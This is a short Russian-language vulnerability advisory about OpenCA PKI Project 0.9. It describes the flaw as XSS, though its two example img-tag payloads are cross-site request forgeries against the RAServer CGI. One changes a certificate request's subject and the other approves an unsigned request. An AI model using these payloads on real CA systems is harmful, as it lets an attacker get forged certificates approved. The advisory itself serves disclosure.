Программа: OpenCA PKI Project 0.9

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за того, как OpenCA обрабатывает запросы, выполняемые через различные формы. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:

<img src="https://hostname/cgi-bin/ra/RAServer?cmd=changeCSR&dataType=NEW_REQUEST&key= 57888&SUBJECT_ATTRIBUTE_0_0=CN&SUBJECT_VALUE_0_0= &SUBJECT_ATTRIBUTE_2_0=O&SUBJECT_VALUE_2_0=XSRF+ Org&SUBJECT_ATTRIBUTE_1_0=CN&SUBJECT_VALUE_1_0= XSRF+CN&SUBJECT_ATTRIBUTE_3_0=DC&SUBJECT_VALUE_3_0= example&SUBJECT_ATTRIBUTE_4_0=DC&SUBJECT_VALUE_4_0= com&SUBJECT_ALT_NAME_ATTRIBUTE_0=DNS&SUBJECT_ALT_NAME_VALUE_0=xsrfsan"/>

<img src="https://hostname/cgi-bin/ra/RAServer?head=&cmd=approveCSRnotSigned&signature=& dataType=PENDING_REQUEST&text=-----BEGIN %20HEADER-----%0ASERIAL%20=%2058912%0A-----END%20HEADER-----%0A-----BEGIN%20CERTIFICATE%20REQUEST-----%0AMIIBqjCCARMCAQAwajELMAkGA1UEBhMCQVUx EzARBgNVBAgTClNvbWUtU3RhdGUx%0AITAfBgNVBAoTGEludGVybmV0IFdpZ GdpdHMgUHR5IEx0ZDEjMCEGA1UEAxMabXlo%0Ab3N0bmFtZS5leGFtcGxlLmNvbTo0ND MwgZ8wDQYJKoZIhvcNAQEBBQADgY0 AMIGJ%0AAoGBAJSFtl67sEEZ88wyj0uxgVKlaMl%2FifSNLZPblqlCu%2BhgF3DHhFe80z5DxUk8%0AEbChgri9cVMfh K7IkInxEr6Cuz3Jv651IKX2XL4GsL1ZxZzQ8u3yw ClSBVk5jBk7%0Ax7qHw%2FkyU8DNDqIJXY2ZkWAeGty7vMGyPTWRan FO8oIGO%2F7bAgMBAAGgADANBgkq%0AhkiG9w0BAQUFAAOBgQCQhWQrs54Jb8G
In8q3l2OHkmXXM5HV8aDwffwipcGPZHe9%0ANtc3be0xSQDt1q4rEikMKDVR1WTm5FubXs 7ZQpDPbVU5t%2BM%2B%2BUuRbUmdP7PYltt R%0AnMg%2BEzZKP4S%2BOp4iZRA8cyqJQaJ63aQ2KzGp%2FBx7nPTjdH %2FnX3vN4tHhC1tKcw%3D%3D%0A----- END%20CERTIFICATE%20REQUEST-----%0A&key=58912"/>

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии